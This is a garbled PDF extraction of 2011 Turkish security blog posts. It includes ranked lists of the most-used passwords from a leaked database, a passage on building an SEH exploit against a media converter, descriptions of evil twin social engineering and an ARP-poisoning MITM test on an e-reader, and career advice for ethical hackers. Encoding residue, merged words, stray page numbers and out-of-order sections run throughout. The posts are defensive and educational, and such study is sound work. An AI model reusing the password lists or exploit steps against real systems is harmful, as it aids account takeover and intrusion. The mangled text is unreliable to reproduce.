Hack edilen veritabanları ayrıca ahlaklı korsanlar ve sistem youmlneticileri iccedilinde oldukccedila değerlidir Mesela sistem youmlneticileri buveritabanlarında yer alan şifreleri analiz ederek tahmin edilmesi kolay olan şifreleri tespit edebilir ve youmlnettiği sistemlerde bu şifrelerinkullanılmasını yasaklayabilir Bu yaklaşımın amacı bir nevi şifre kara listesi oluşturmaktır bu sayede şifre politikalarına rağmen zayıfşifre kullanmaya meyilli olan kullanıcıların bu şifreleri kullanması engellenebilir

Ahlaklı korsanlar ise bu veritabanlarında yer alan bu şifreleri kendilerine guumlzel bir soumlzluumlk oluşturmak amacıyla kullanabilirler Bu soumlzluumlksayesinde izin alınmış hedef bir sisteme sızmak iccedilin gerccedilekleştirilen soumlzluumlk saldırılarının (dictionary attack) başarıya ulaşma ihtimaliyuumlkselir ve sistemdeki zayıf şifre kullanan kullanıcılar tespit edilerek olası bir ihlalin ve yaratacağı etkinin oumlnuumlne geccedililmiş olur Peki yaaynı youmlntemi ahlaksız korsanlarda izlerse ne olur Bu durumda herhangi bir sistem uumlzerinde zayıf şifre kullanan kullanıcıların hesaplarıkısa bir suumlre iccedilinde art niyetli kişilerin kontroluumlne geccediler ve kullanıcılar iccedilin kabus dolu guumlnler başlamış olur

Bu veritabanı ile karşılaşınca en ccedilok yurdum insanı guumlccedilluuml şifre kullanımı konusunda ne kadar bilinccedilli sorusuna cevap aramak istedimve grep cat sort uniq head wc gibi basit metin araccedilları ile işe koyuldum

Son kullanıcılar iccedilin guumlccedilluuml şifre politikası buumlyuumlk kuumlccediluumlk harflerden sayılardan oumlzel karakterlerden ve en az 8 karakterden oluşmalıdırduumlşuumlncesiyle bu politika ile uyumsuz olan şifreleri veritabanında aratmaya başladım

Tekil (uniq) şifrelerin sayısıcat passtxt | sort | uniq -ciu | wc -l

26123

En uzun şifrenin uzunluğucat passtxt | sort | uniq -ciu | wc -L

28

Sadece sayılardan oluşan 50 şifregrep -e ^[0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456103 111111

84 12312381 000000

73 123456789

65 666666

58 12345678

56 112233

39 121212

38 14531453

32 123654

29 654321

29 19031903

28 159753

25 19051905

25 123321

24 313131

46

22 131313

21 1234567

20 19881988

20 19871987

20 112358

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

17 222222

17 19861986

17 19841984

17 12341234

16 102030

15 159357

15 147852

14 7777777

13 333333

13 19901990

12 987654321

12 987654

12 852456

12 353535

12 252525

12 19851985

12 19801980

12 159951

12 12344321

12 12121212

12 010203

12 00000000

47

Sadece sayılardan oluşan tekil (unique) şifrelerin sayısıgrep -e ^[0-9]$ passtxt | sort | uniq -icu | wc -l

10842

Sadece harflerden oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -ic | sort r | head -n 50

115 (sitenin adı sansuumlrlendi)57 qwerty

47 sanane41 istanbul

34 ankara

30 password

30 parola

30 asdasd

26 galatasaray

26 besiktas

25 Fenerbahce

21 deneme

19 cimbom

17 qazwsx

16 portakal

16 kartal

14 asdfgh

12 aaaaaa

11 unuttum

11 merhaba

10 zeynep

10 malatya

10 hebele

9 yagmur

9 qweasd

9 kelebek

9 kanarya

9 hacettepe

8 penguen

8 mustafa

48

8 karakartal

8 darkness

7 ultraslan

7 serdar

7 manyak

7 cancan

7 asdfghjk

7 anamur

6 trabzon

6 sananebe

6 metallica

6 marmara

6 kertenkele

6 karakter

6 hedehodo

6 emreemre

6 egemen

6 anadolu

6 alperen

5 zxcvbn

Sadece harflerden oluşan tekil (unique) şifrelerin sayısı (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z]$ passtxt | sort | uniq -icu | wc -l

6042

En ccedilok kullanılan 50 şifrecat passtxt | sort | uniq -dci | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

49

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

50

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

Hem harflerden hem de sayılardan oluşan 50 şifre (Tuumlrkccedile karakterler hariccedil)grep -e ^[a-zA-Z0-9]$ passtxt | sort | uniq -ic | sort r | head -n 50

979 123456115 (sitenin adı sansuumlrlendi)

103 11111184 123123

81 000000

73 123456789

65 666666

58 12345678

57 qwerty

56 112233

47 sanane

41 istanbul

39 121212

38 14531453

34 ankara

32 123654

30 password

30 parola

30 asdasd

29 654321

29 19031903

28 159753

26 galatasaray

26 besiktas

25 fenerbahce

51

25 19051905

25 123321

24 313131

24 1q2w3e

24 123qwe

22 bjk1903

22 131313

21 deneme

21 1q2w3e4r

21 1234567

20 19881988

20 19871987

20 112358

19 cimbom

19 555555

19 212121

19 19891989

19 19071907

19 1123581321

19 101010

18 qwe123

17 qazwsx

17 222222

17 19861986

17 19841984

52

En ccedilok kullanılan şifrelere bakıldığında ve kullanılan şifrelerin 40ının sayılardan 37sinin sadece İngilizce harflerden oluştuğuduumlşuumlnuumllduumlğuumlnde guumlccedilluuml şifre kullanımında istenilen seviyede olduğumuzu soumlylemek biraz guumlccedil olur

Art niyetli kişilerin şifrelerinizi tespit etmelerini zorlaştırmak iccedilin mutlaka ama mutlaka şifrenizde buumlyuumlk ve kuumlccediluumlk harflere sayılara oumlzelkarakterlere ($ vb) ve en az 8 karakter uzunluğunda olmasına oumlzen goumlsterin ve her platformda sistemde farklı şifreler kullanmayaccedilalışın aksi durumda kişisel bilgilerinizin hesaplarınızın ele geccedilmesiyle telafisi guumlccedil olan zor guumlnler geccedilirebilirsiniz

Sistem ve veritabanı youmlneticilerine ise bu tuumlr durumlara duumlşmemek ve kullanıcılarını zor durumda bırakmamaları iccedilin kullanıcılara aitşifreleri veritabanı uumlzerinde mutlaka ama mutlaka şifreli (encrypted) veya saltlanmış + hashlenmiş olarak saklamalarını şiddetle oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese guumlvenli guumlnler dilerim

Android Uğruna Risk Almaya Değer mi Source httpswwwmertsaricacomandroid-ugruna-risk-almaya-deger-miBy MS on December 31st 2010

Geccediltiğimiz sabah bir arkadaşımın goumlndermiş olduğu bir e-posta gerccedilek anlamda beni hayrete duumlşuumlrduuml E-posta bir bankanınmuumlşterileri iccedilin hazırlamış olduğu iki Java uygulaması ile ilgiliydi Bu uygulamalardan biri cep telefonunda bankacılık işlemleriningerccedilekleştirilmesini sağlarken bir diğeri ise bireysel interaktif bankacılık işlemlerinde kullanılmak uumlzere Tek Kullanımlık Şifreuumlretilmesini sağlıyordu ve bu iki uygulamada resmi olarak Android işletim sistemini desteklemiyordu Arkadaşım iccedilin e-postanın encan alıcı kısmı bir forumdaki bir kişinin bu uygulamaları Android işletim sistemi ile uyumlu hale getirmesiydi Kuşkusuz bu girişiminnedeni Android işletim sistemi uumlzerine ilave program kurmadan Java uygulaması ccedilalıştırılamıyor olması ve bankaların Android işletimsistemi ile uyumlu uygulamalar geliştirmiyor olmasıydı

53

54

Bankalar tarafından muumlşterilerin kullanımına sunulan bu tuumlr mobil uygulamalar genellikle Java destekleyen mobil cihazlarda ve IPhoneIPAD cihazlarında ccedilalışmaktadır Her ne kadar Android uygulamaları Java ile yazılıyor javac derleyicisi ile derleniyor ve standart Javabayt kodu (bytecode) yani class dosyası oluşturuyorda olsa son adımda DEX formatına ccedilevrilerek farklı bir dosya formatına buumlruumlnmekteve Android işletim sistemi uumlzerinde ccedilalışabilir hale gelmektedir Androidrsquoin APK dosyasını Javarsquonın JAR dosyası DEX dosyasını iseJavarsquonın class dosyası gibi duumlşuumlnebilirsiniz

Piyasada dex dosyasını class dosyasına class dosyasını dex dosyasına ccedileviren programların bulunması ve ayrıca class dosyalarınıdecompile edebilen ccedilok sayıda programın olması nedeniyle bir Java uygulamasının Android işletim sistemi ile uyumlu hale getirilmesibeni ccedilok şaşırtmadı (Internette ufak bir araştırma yapacak olursanız JAR paketini APK paketine ccedileviren web siteleri olduğunu bilegoumlrebilirsiniz)

Beni asıl şaşırtan herhangi bir kişi tarafından oluşturulan doğruluğu ve guumlvenilirliği soru işareti olan bu paketlerin bir ccedilok kişi tarafındanindirilmiş ve cep telefonlarına kurulmuş olmasıydı Oumlzellikle cep telefonlarına bulaşan Zeus trojanının etrafı kasıp kavurduğu şu guumlnlerdebu tuumlr paketlerin sorgusuz sualsiz cep telefonlarına kuruluyor olması farkındalığın ne boyutlarda olduğuna dair guumlzel bir oumlrnekti

Bunun uumlzerine bende paketi indirip kısaca bir goumlz atmaya karar verdim

55

Pakette yer alan mesajda Koumltuuml bir amaccedil veya başka birşey asla guumlduumllmemiş ifadesi yer alıyordu Ayrıca paketi hazırlayan kişi paketiniccediline hediye olarak Angry Birds oyununu koymayıda ihmal etmemişti Guumlvenlik ile ilgili haberleri takip ediyorsanız geccediltiğimiz guumlnlerdeAngry Bird oyununun kullanıcı bilgilerini kopyaladığına dair haberlere rastlamışsınızdır

56

Paketin iccedilinden ccedilıkan APK dosyalarını accedilmak iccedilin uzantılarını ZIP olarak değiştirip accediltığımda beklendiği gibi her bir paket iccedilindenDEX ve ayrıca DAT uzantılı dosyalar ccedilıktı Hex editoumlr ile şuumlpheli bir duruma karşı dosyalara kısaca goumlz attığımda mobil uygulamalaraait parametrelerin DAT uzantılı dosyalarda şifresiz olarak saklandığını goumlrduumlm Accedilıkccedilası bu durum beni biraz şaşırttı ccediluumlnkuuml dış duumlnyaile paylaşılan bir uygulamanın banka tarafından katmanlı guumlvenlik stratejisi ile hazırlanmış olmasını beklerdim Ayrıca forumda mobiluygulama bağlantı adresinin elden ele dolaşmasıda bana pek doğru gelmedi en azından bankadan uygulamaları indirtmeden oumlncemuumlşterilerini doğrulamasını beklerdim

Ccedilok ileriye gitmeden goumlz attığım kadarıyla şuumlpheli bir durum ile karşılaşmadım ancak her bir DEX dosyasını analiz edene kadar buiki dosyanında zararsız olduğunu soumlylemek ccedilok doğru olmayacaktır Sonuccedilta art niyetli bir kişi isterse DEX dosyalarını disassembleedebilir bayt kodlarını değiştirerek bankacılık işlemlerini manipuumlle edebilir ve bunu Android uyumlu paket hazırladığını ileri suumlrerekmasum insanları kolaylıkla ağına duumlşuumlrebilir Bu nedenle doğruluğundan ve guumlvenilirliğinden emin olmadığınız uygulamaları oumlzellikleve oumlzellikle bankacılık uygulamalarını cep telefonunuza kurmamanızı oumlneririm

Bir sonraki yazıda goumlruumlşmek dileğiyle herkese sağlık ve mutluluk dolu bir yıl dilerim

  • Introduction
  • Bellek Analizi ile Zararlı Yazılım Analizi
  • Firefox Oturum Geri Yuumlkleme Oumlzelliği
  • Temassız Tehlike
  • Her Goumlrduumlğuumlne İnanma
  • Zararlı Yazılım Analisti Olmakhellip
  • XSS = Basit Bir Kutucuk
  • 5 Dakikada SEH İstismar Aracı (Exploit) Hazırlama
  • Şeytan İkiz
  • Cybook Orizon Mini Pentest
  • Nasıl Ahlaklı Korsan Olunur
  • Web Servis Guumlvenliğine Dair
  • Googlersquoa Bile Guumlvenme
  • Script Kiddie Bezdirme Mekanizması
  • Devletrsquoin Sitesi Denizhellip
  • Virusscan BUP Restore Utility
  • Hackerlarrsquoın Goumlzuumlnden Flash Uygulamaları
  • Ne Tuumlr Şifreler Kullanıyoruz
  • Android Uğruna Risk Almaya Değer mi
Page 20: Hack 4 Career - 2011

20

Karşımıza ccedilıkan youmlnergelerde istismar aracının başarıyla ccedilalışabilmesi iccedilin POP POP RET adresine ve kabuk koduna (shellcode)ihtiyacımız olduğu belirtildiği iccedilin komut satırında oumlncelikle pvefindaddr p -n yazarak SAFESEHin devre dışı olduğu bir DLLde yeralan POP POP RET adresi bularak istismar aracımızın iskeletini oluşturmaya devam edelim

21

Son olarak hesap makinasını (calcexe) ccedilalıştıracak kabuk kodunu (shellcode) ister Metasploit ile oluşturarak ister herhangi bir istismararacından kopyalayarak şablonda ilgili yere kopyalayarak iskeleti tamamlayalım ve istismar aracını ccedilalıştırarak zafiyeti istismar edenWAV dosyasını oluşturalım WMA MP3 Converter programını ccedilalıştırdıktan sonra MP3 butonuna basarak istismar aracımız tarafındanoluşturulan yeni MSwav dosyasını seccediltiğimizde hesap makinası karşımıza ccedilıkacak ve mutlu sona ulaştığımızı goumlreceğiz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin doumlrduumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Şeytan İkizSource httpswwwmertsaricacomseytan-ikizBy MS on June 19th 2011

Geccediltiğimiz aylarda RSAin sistemlerine sızan kişilerin Securid ile ilgili bilgileri ccedilaldıkları ortaya ccedilıktı RSA tarafından yapılanaccedilıklamada saldırıların başlangıccedil noktasında sosyal muumlhendislik ve olta saldırısı (phishing) olduğu dikkat ccedilekiyordu Olta saldırısınıgerccedilekleştirmek iccedilin sosyal ağlardan faydalanan ahlaksız korsanların RSA ccedilalışanlarına ait bilgileri elde ettikleri tahmin ediliyor

İşin iccedilinde insan faktoumlruuml olduğu suumlrece 100 haneli şifre ile korunan bir sisteme sızmak isteyenler şifreyi kırmak yerine sistemsorumlularını kandırma yolunu tercih ediyorlar ve eninde sonunda başarıya ulaşıyorlar bu nedenle RSAin başına gelenlere ccedilokşaşırmıyorum oumlzellikle sosyal ağlarda firma ccedilalışanları tarafından paylaşılan bilgilerin ilerleyen zamanlarda ccediloğu firmanın başını dahaccedilok ağrıtacağını duumlşuumlnuumlyorum

Art niyetli kişiler sosyal muumlhendislik saldırılarında olta saldırılarından faydalandıkları gibi şeytan ikiz (Tuumlrkccedile mealini kendimuydurdum aslı evil twinkoumltuuml ikiz) youmlnteminden de faydalanabiliyorlar Şeytan ikiz youmlntemi teknolojinin nimetlerinden faydalanarakhedef kurumsistemler hakkında o kurumun bir ccedilalışanını taklit ederek hedef kişikişiler uumlzerinden bilgi toplamak kurum sistemlerinesızmak iccedilin hedef kişikişilerin zararlı bir dosyayı (RAT) ccedilalıştırmaları amacıyla kullanılıyor

Amaccedilları gerccedilek bir kişiyi taklit etmek olduğu iccedilin art niyetli kişiler kurban ile ilgili tuumlm bilgileri Facebook Twitter Linkedin Foursquaregibi sosyal ağlardan toplayarak bir araya getiriler Facebook ve Twitter durum mesajları uumlzerinden bu kişinin neler yaptığını Linkedinuumlzerinden oumlzgeccedilmişini Foursquare uumlzerinden hangi mekanlara sıkccedila uğradığını Google arama motoru uumlzerinden de elde edebildiklerigeri kalan bilgileri elde ederek hedef bir sosyal ağ seccediler (kurum ccedilalışanlarına ulaşması kolay olduğu iccedilin ccediloğunlukla Linkedini tercihederler) ve daha sonra burada bu kişi adına sahte bir profil oluşturarak bu kişinin bağlantıları ile iletişime geccedilerek bu kişiyi taklit ederekbağlantı kurdukları kişileri kandırarak hassas bilgilere erişmeye ve oradan sistemlere sızmaya ccedilalışırlar Bu saldırıların oumlnuumlne geccedilmekisteyen kurumsal firmalar ccedilalışanlarının iş ile ilgili sosyal ağlarda (Linkedin) profillerini genele accedilmamaları ve kurumal e-posta adresleriile bu tuumlr sitelere uumlye olmamaları konularında uyarırlar

Genele accedilık Twitter hesabım olduğu iccedilin birguumln Twitter uumlzerinden kendimle ilgili ne tuumlr bilgiler elde edebileceğini merak ettim ve buzamana dek goumlndermiş olduğum mesajları arşivleyen bir site aradım ancak bulamadım Kafaya koyan biri buguumlne kadar goumlndermişolduğum tuumlm mesajları elde edebilir mi diye kafa patlatmaya başladım ve ufak bir program hazırlamaya başladım ve sonunda ortayahedef twitter hesabından buguumlne kadar goumlnderilen tuumlm mesajları toplayan ve kayıt eden twitter_crawlerpy adında bir program ortayaccedilıkıverdi

Programa buradan ulaşabilirsiniz

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin uumlccediluumlncuumlsuuml burada son bulurken herkese guumlvenli guumlnler dilerim

Ekran goumlruumlntuumlsuuml

22

Cybook Orizon Mini PentestSource httpswwwmertsaricacomcybook-orizon-mini-pentestBy MS on April 19th 2011

Bilişim guumlvenliği ile ilgili teknik kitaplar okumaya bayılıyorum oumlzellikle beni zorlayan ccedilıta yuumlkselten kitaplar oldu mu tadındanyenmiyor Kitap okumadığım zaman geri kaldığımı duumlşuumlnerek kendimi koumltuuml hissediyorum bu nedenle kitap okuma konusunda ilginccedilbir motivasyona (takıntı da denebilir )) sahibim Uumlniversite zamanında hayatımın buumlyuumlk bir boumlluumlmuuml bilgisayar başında e-book okumakile geccedilerken iş hayatına geccediliş sonrasında e-book ccedilıktıları ile gezer durur oldum Oumlzellikle işe giderken ve işten gelirken serviste kitapokumak benim iccedilin buumlyuumlk bir keyif ancak her guumln 10-20 sayfalık ccedilıktı almak A4e bassan kocaman kitapccedilık yapsan kuumlccediluumlcuumlk kağıtisrafı goumlz yorgunluğuydu derken okuma aşkı beraberinde bir ccedilok sorunu da getiriyor

Neyse ki nişanlım duruma muumldahale ederek geccediltiğimiz aylarda bana bir e-book okuma cihazı hediye etti Cybook Orizon Duumlnyanın enince e-book okuma cihazı olmasının yanısıra hafif olması (250 gr) dokunmatik ekrana sahip olması micro-usb girişinin olması 2 GBdahili belleğe WIFI bluetooth ve akselerometreye (accelerometer) sahip olması beni memnun eden oumlzelliklerinin başında geliyor

Ahlaklı korsana hediye edilen elektronik cihazın ufak ccedilaplı penetrasyon testinden geccedilirilmemesi gibi bir durum soumlz konusu olamazdıolmadı da )

Teste ilk olarak port taraması ile başladım ve hiccedil accedilık port bulamadım

Daha sonra ARP zehirleme ile MITM (ortadaki adam) saldırısı gerccedilekleştirerek tuumlm trafiği izlemeye başladım Web trafiğindenelde ettiğim bilgiler sayesinde cihaz uumlzerinde ARM Linux kullanıldığını 2621 kernel suumlruumlmuumlne sahip olduğunu ve Mozilla tabanlıoumlzelleştirilmiş bir internet tarayıcısı kullanıldığını oumlğrendim

23

Internet tarayıcısında denediğim aboutconfig ve benzer youmlntemlerin hiccedilbiri işe yaramadı Bunun uumlzerine IKAT (Interactive Kiosk AttackTool)in sitesine bağlanarak internet tarayıcısı uumlzerinden işletim sistemine erişecek youmlntemleri de teker teker denedim ancak yine başarılıolamadım

Cihaz uumlzerinde bluetooth desteği olduğunu soumlylense de henuumlz aktifleştirilmemiş ve yerleşik yazılım (firmware) guumlncellemesi ileaktifleştirileceği belirtiliyor Bu durum aslında yerleşik yazılım uumlzerinde bir ccedilok opsiyonun gizlendiğine işaret ediyor Cybookunsitesinden indirmiş olduğum yerleşik yazılımı incelediğimde normal olarak anlamlı hiccedilbir karakter dizisi ile karşılaşmadım Karakterdağılımına baktığımda ise neden karşılaşmadığım ortadaydı Yerleşik yazılım uumlzerinde yer alan ilk 5 bayt (Boo16) dikkatimi ccedilekti ancakarama motorları uumlzerinde yaptığım araştırmalar sonuccedilsuz kaldı Yerleşik yazılım uumlzerinde manipuumllasyonlar gerccedilekleştirerek ipuccedilları eldeetme yolunu tercih etmek isterdim ancak yazılımın bozulması durumunda bana yol koumlpruuml baraj olarak geri doumlneceği iccedilin daha ilerigitmedim )

Cihaz uumlzerinde yer alan menuumllerde gezinirken Ebook Store menuumlsuumlnuumln ilginccedil işlevi dikkatimi ccedilekti Bu menuumlye girince internet tarayıcısıotomatik olarak sizi Cybookun bir alt sitesine youmlnlendiriyor ve cihazı ADOBE ID ile aktifleştirmenizi sağlıyor Buraya kadar herşeynormal ancak aktifleştirme kısmında javascript ile cihaza goumlnderilen komutlar dikkatimi ccedilekti BOO_CMD ile goumlnderilen her komutunbir işlevi bulunuyor ve site bağımsız olarak bu komutları nerede goumlruumlrse goumlrsuumln aynı işlevi yerine getiriyor Komutları ortaya ccedilıkartmak(enumerate) iccedilin ufak bir betik (script) hazırlayarak karakterinden sonra gelebilecek en fazla 4 karakterden oluşan komutları (dahafazlası web sayfasının boyutunu buumlyuumltuumlyordu) oluşturdum ve daha sonra cihazın oluşturduğu trafiği izlemeye başladım ancak Syncdışında trafik oluşturan herhangi bir komut karşılaşmadım

Son olarak cihazın guumlvenli bir siteye (SSL) bağlanma esnasında sahte sertifika ile karşılaşması durumunda nasıl bir aksiyon aldığınıgoumlrmek iccedilin ufak bir test gerccedilekleştirdiğimde beni uumlzen bir durum ile karşılaştım Cihaz guumlvenli bağlantının kurulması esnasındaMITM saldırısı gerccedilekleştirilmesi durumunda herhangi bir uyarı vermeden iletişim kurmaya devam ediyor yani Starbucksta kahveniziyudumlarken bir yandan e-postalarımı guumlvenli bir şekilde kontrol edeyim deme gibi bir şansınız ne yazıkki bulunmuyor

24

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin birincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Nasıl Ahlaklı Korsan Olunur Source httpswwwmertsaricacomnasil-ahlakli-korsan-olunurBy MS on May 19th 2011

Bu soruyu kendime ilk sorduğumda 15-16 yaşlarındaydım Google arama motorunun var olduğu ama bilinmediği o yıllarda Altavistaarama motoru ile bu soruya yanıt aramak ve cevabını iccedileren sayısız kaynağa ulaşmak pek muumlmkuumln olmuyordu bu nedenle benim deyolum o zamanlar kullanımı oldukccedila popuumller olan IRC sunucularından geccedilti EFnet IRC Ağında yer alan Hackers kanalında sabahakşam konuşmaları takip ederek az da olsa birşeyler oumlğrenmeye ccedilalışıyordum Guumlnuumln birinde sohbet ettiğim bir kişi (keşke rumuzunuhatırlayıp teşekkuumlr edebilsem) samimi bir şekilde programlama konusunda bilgi sahibi olmam gerektiğini ve işletim sistemi olaraksadece Windows ile yetinmeyerek Linux işletim sistemi de kullanmam gerektiğini soumlylemişti Programlama kısmını anlıyordum ancakkara kuru bir ekranda ccedilalışmanın bana ne gibi bir getirisi olacağı konusunda şuumlphelerim vardı Aradan 15 sene geccediltikten ve ahlaklı korsan(ethical hacker penetration tester) olduktan sonra ne zaman program yazsam kendi kendime adam haklıymış der ne zaman Backtrackile ccedilalışmam gerekse al sana kara kuru ekran der dururum )

Ne mutlu bana ki duumlnyanın 4 bir yanından oumlzellikle genccedil arkadaşlardan ccedilok sayıda e-postalar alıyor ve her birini oumlzenle yanıtlıyorumCcediloğunun yanıtını aradığı tek bir soru var nasıl ahlaklı korsan olurum nereden ve nasıl başlamalıyım

Oumlncelikle yazımı ahlaksız korsanların okuması ihtimaline karşı neden ahlaklı olunması gerektiği konusunu kısaca bir kaccedil madde ileaccedilıklayayım

bull Yasalar ile başınız derde girmez

bull Bu işi kariyere doumlnuumlştuumlrerek uzun vadede para kazanabilirsiniz

bull İnsanların guumlvenini sevgisini ve saygısını kazanabilirsiniz

bull İşvereninizin desteğini arkanıza alarak pahalı eğitimlere konferanslara bedava katılma şansı yakalayabilirsiniz )

Gelelim ahlaklı korsan olmak iccedilin yapmanız gerekenlere

bull İngilizce oumlğrenin Herşeyden oumlnce İngilizce bilmeniz gerekir en azından okuduğunuzu anlayacak kadar diyelim Nedeni basitguumlvenlik sektoumlruumlnde gerccedilekleştirilen ccedilalışmalardan kaynaklara kadar ccediloğu materyalin dili İngilizce bu nedenle guumlndemigelişmeleri yakından takip edebilmek iccedilin ne yapın ne edin oumlncelikle İngilizce oumlğrenmeye bakın olmazsa olmaz

bull Programlama dili oumlğrenin Hackerın İngilizce soumlzluumlk anlamına bakacak olursanız programcı kelimesinin geccediltiğini goumlrebilirsinizKorsan olupta programlama bilmemek gibi bir şansınız yok yok diyenlerede itibar etmeyin İstismar aracı hazırlamayı bir kenarakoydum en azından kısa zamanda ccedilok iş başarabilmek ve bunu otomatiğe bağlayabilmek iccedilin kendi programınızı yazmanız gerekenzamanlar mutlaka olacaktır Teknik olarak ileri seviyeye ilerledikccedile (misal tersine muumlhendislik yaparken) programlamanın şartolduğunu goumlrebilirsiniz Guumlvenlik zafiyeti keşfedebilmek iccedilin C programlama dilini oumlğrenmeniz gerekecektir Bu dil sayesindediğer programlama dillerini okuduğunuzda rahatlıkla anlayabildiğinizi goumlreceksiniz bu sayede kaynak kodu analizi sizin iccedilin dahakolay olacaktır Testler esnasında işinizi kolaylaştıracak dillerden bir tanesini muhakkak oumlğrenmelisiniz Bunun iccedilin Pythonutercih ettim mutluyum huzurluyum Kapalı kaynak kodlu yazılımlarda guumlvenlik zafiyeti keşfetmekten istismar kodu kabuk koduoluşturmaya kadar bir ccedilok aşamada Assembly programlama dilini biliyor olmanız yararınıza olacaktır Metasploit ve diğer araccedillarile hepsini hallederim demeyin başlangıccedil seviyesinden oumlteye gidemez program bağımlı yaşarsınız

bull Bol bol okuyun ve pratik yapın Ağ sistem veritabanı web uygulaması konularında temel kitaplar okuyun ve bilgi seviyeniziarttırın Temel seviyede bilgi sahibi olduktan sonra tuumlm bu alanlar ve daha fazlası ile ilgili hacking kitapları okumaya başlayınBunun iccedilin Amazoncom sitesine giderek hacking anahtar kelimesi ile sorgular yapın ve en ccedilok okunan beğenilen kitapları sıraylaokumaya başlayın Başlangıccedil seviyesi iccedilin Hacking Exposed serilerini oumlnerebilirim Okuduğunuzu pratik etmezseniz unutmanızve ihtiyaccedil duymanız durumunda tekrar okumanız gerekebileceği iccedilin kendinize windows ve linux işletim sistemleri kurulu ikisanal makina oluşturun ve tuumlm denemelerinizi oumlğrendiklerinizi bu sistemler uumlzerinde gerccedilekleştirerek pratiğe doumlkuumln

bull Sertifika alın ve eğitimlere gidin Kim ne derse desin sertifikalar işe girmenizi kolaylaştırmaktadır Sertifikayı kartvizit olarakduumlşuumlnebilirsiniz Karşı tarafın (işveren iletişim kurduğunuz kişiler vs) spesifik olarak belli bir alanda sertifikalandırabilecekduumlzeyde temel bilgi seviyesine sahip olduğunuzu anlamasına yardımcı olacaktır Tehditler riskler ve suumlrekli değişen saldırıyoumlntemlerini goumlz oumlnuumlnde bulundurduğunuzda kendinizi suumlrekli guumlncel tutmanız gerekiyor ve katılacağınız eğitimler kitaplarakıyasla kısa zamanda bu bilgiyi almanızı sağlamaktadırlar (Maddi olanakları ccedilok fazla dert etmeyin ccediluumlnkuuml kurumsal bir firmadaccedilalışıyorsanız eğitime bedava gidebileceksiniz)

bull Sabırlı ve duyarlı olun Bir guumlvenlik zafiyeti keşfettiğiniz zaman (karşı sisteme saldırarak değil) oumlrnek olarak kullandığınız birhizmet tasarımsal olarak guumlvenli değil veya kullandığınız programda guumlvenlik zafiyeti keşfettiniz yapacağınız ilk iş zafiyetin doğrugeccedilerli olduğunu teyit etmek olmalıdır Emin olduktan sonra responsible disclosure modelini izleyerek sistemin yetkilisi veyaprogramın dağıtıcısı ile goumlruumlşerek durumu izah etmeye ccedilalışın Empati yaparak kendinizi karşı tarafın yerine koyun ve amacınızınguumlvenlik zafiyetini ortadan kaldırmak olduğunu ve bu hizmeti veya programı kullanan kişilerin art niyetli kişiler tarafından istismaredilmesini engellemek olduğunu ve bu nedenle karşı taraf ile iletişime geccediltiğinizi aklınızdan ccedilıkartmayarak karşı taraf ile şartlarne olursa olsun işbirliği yapmaya ccedilalışın Responsible disclosure modelinde zafiyet ortadan kalktıktan sonra zafiyet ile ilgili

25

detaylı bilgiye ilgili platformlarda yer verebilirsiniz eğer firma guumlvenlik buumllteninde adının geccedilmesini istemiyorsa saygı duyun vesansuumlrleyerek yayınlayın ccediluumlnkuuml amacımız firmayı ve hizmetlerini koumltuumllemek değil insanların guumlvenliğini sağlamak

bull Bilişim hukukundan anlayan bir avukat tutun Responsible disclosure modelinde karşı taraf ile iletişim kurmaya ccedilalışırsınız ancakiletişim kuramadığınız durumlarda daha doğrusu karşı taraftan herhangi bir yanıt alamadığınız durumlarda bu guumlvenlik zafiyetiniilgili platformlarda accedilıklayarak bu sistemi veya hizmeti kullanan insanları bu konuda bilgilendirir ve yetkilileri goumlreve ccedilağırırsınızAncak kimi zaman işler istediğiniz şekilde ilerlemeyebilir ve karşı taraf e-posta atmışsın ama telefon accedilmamışsın diyebilir ben 20yıldır guumlvenlik sektoumlruumlndeyim vay efendim sen benim kim olduğumu biliyor musun diyebilir guumlvenlik zafiyetini namus meselesiyaparak sen benim namusuma nasıl el uzatırsın diyebilir sizin onlarla onların iyiliği ve muumlşterilerinin guumlvenliği iccedilin iletişimkurmaya ccedilalıştığınızı unutarak itibarımı zedeledin diyebilir oumlzetle karşı taraf sizin iyi niyetinizi suistimal ederek sonunda hukukiyollara başvurabilir ve kendinizi yasalar oumlnuumlnde savunmanız gerekebilir (Buguumlne kadar yerli yabancı buumlyuumlk kuumlccediluumlk 50ye yakınfirma ile responsible disclosure adımından geccedilmiş biri olarak bu ihtimalin ccedilok duumlşuumlk olduğunu ve sadece bu tuumlr bir tavırla 1 defakarşılaştığımı genellikle kurumsal şirketlerde bu tuumlr bir yaklaşımın olmadığını aksine size teşekkuumlr edildiğini belirtmek isterim)Bu nedenle iyi bir avukat tutmanız her zaman yerinde bir adım olacaktır

Uzun lafın kısası ahlaklı korsan olmak iccedilin yapmanız gerekenler İngilizce bilmek ağ sistem veritabanı web uygulamaları konularındatemel bilgi sahibi olmak programlama bilmek eğitimlere katılmak sertifikalar almak ve bol bol hacking ile ilgili kitaplar okumak vepratik yapmak olacaktır

Askere gitmeden oumlnce hazırlamış olduğum yaylalar yazı dizisinin ikincisi burada son bulurken herkese guumlvenli guumlnler dilerim

Web Servis Guumlvenliğine DairSource httpswwwmertsaricacomweb-servis-kullanimina-dairBy MS on March 23rd 2011

